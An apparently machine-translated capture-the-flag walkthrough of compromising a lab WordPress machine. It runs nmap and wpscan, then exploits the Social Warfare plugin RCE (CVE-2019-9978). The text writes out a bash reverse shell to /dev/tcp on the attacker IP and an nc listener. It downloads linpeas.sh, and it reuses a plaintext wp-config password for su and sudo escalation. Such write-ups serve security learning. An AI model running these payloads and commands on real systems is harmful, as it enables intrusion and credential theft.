Infiltrate ideas ：

nmap scanning ---- gobuster Scan the website directory ---- wpscan Scanning found vulnerability plug-ins ---- utilize wordpress plug-in unit Social Warfare Of RCE Loophole getshell（ No need to log in ）---- wordpress The configuration file discloses the plaintext password , Switch to user takis ---- sudo su Raise the right ---- see .bash_history Find out flag

environmental information ：

Drone aircraft ：192.168.101.87

attack ：192.168.101.34

Specific steps ：

1、nmap scanning

sudo nmap -sV -sC -p- 192.168.101.87

Scan only TCP 22（ssh） and 80（http） port

2、wpscan Scanning found vulnerability plug-ins

Browser access to the target 80 port , The following page appears , There seems to be no useful information

gobuster Scan the website directory , Find out http://192.168.101.87/wordpress/

​gobuster dir -u http://192.168.101.87 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Browser access http://192.168.101.87/wordpress/ Cannot load correctly , Direct use wpscan scanning

​wpscan --url http://192.168.101.87/wordpress/ -e

Scan to user admin, But I tried several small dictionaries later wpscan Blast admin Your password didn't explode , use rockyou.txt It explodes super slow , Then give up

wpscan Also scanned plugin: social-warfare edition 3.5.2

3、 Using plug-ins Social Warfare Of RCE Loophole getshell（ No need to log in ）

stay exploit-db On the search wordpress social, Find a ：WordPress Plugin Social Warfare < 3.5.3 - Remote Code Execution（WordPress Plugin Social Warfare < 3.5.3 - Remote Code Execution - PHP webapps Exploit）

Click to enter , And download exp：46794.py. But it's downloaded exp Not really , Find out exp There is one of them. github Of url（GitHub - hash3liZer/CVE-2019-9978: CVE-2019-9978 - (PoC) RCE in Social WarFare Plugin (<=3.5.2)）, Found usage examples after visiting

Follow the example to launch http service

python2 -m SimpleHTTPServer 80

Create a new file named payload.txt, The contents are as follows

<pre>system('cat /etc/passwd')</pre>

And then execute exp Script , Found back /etc/passwd The content of , It shows that there are loopholes , And use it successfully

​python2 46794.py --target http://192.168.101.87/wordpress/ --payload-uri http://192.168.101.34/payload.txt

take payload.txt The command executed in is changed to bash rebound shell command

<pre>system('bash -c "exec bash -i &>/dev/tcp/192.168.101.34/8888 <&1"')</pre>

On the attack plane nc monitor 8888 port

nc -nlvp 8888

And then execute exp Script , You can get the target www-data User's rebound shell

​python2 46794.py --target http://192.168.101.87/wordpress/ --payload-uri http://192.168.101.34/payload.txt

And then on the target shell Execute the following command , obtain tty

python -c 'import pty; pty.spawn("/bin/bash")'

Enter the drone shell after , Come first /home Under the table of contents , Found only one user takis Home directory , Get into /home/takis I found the first flag：user.txt

4、wordpress The configuration file discloses the database password , Switch users to takis

On the target shell I looked around and couldn't find a way to raise my rights , I have to download it from the attacker linpeas.sh To the target /tmp Directory and execute

wget http://192.168.101.34/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

From the execution results ,/var/www/html/wordpress/wp-config.php The database user name is recorded in clear text wp_user And password R3&]vzhHmMn9,:-5

define( 'DB_NAME', 'wordpress_db' );

define( 'DB_USER', 'wp_user' );

define( 'DB_PASSWORD', 'R3&]vzhHmMn9,:-5' );

define( 'DB_HOST', 'localhost' );

In addition, ports are opened locally 3306 Look at , The database should be mysql, Later, I tried to use wp_user Conduct mysql Sign in , Can log in successfully , But there is no useful information in the database .

Try switching to the user takis

su - takis

Password wp_user Database password for ： R3&]vzhHmMn9,:-5

Switch successful .

5、sudo su Raise the right

see takis Whether it can be or not? sudo Carry out orders , It is found that it can be used as any user sudo Execute any command

sudo -l

Execute the following order to raise the right to root, But in /root/root.txt Not in China flag, There is only one hint ：take a look into my USB

sudo su -

6、 see .bash_history Find out flag

Because in /root There is no USB Folder , So try to check without other clues .bash_history file , Something has indeed been found

cat .bash_history

The highlighted part in the following figure shows flag belong /usr/games/USB/root In file

Get into /usr/games/USB Folder , It does root file , View its contents , Is, indeed, flag~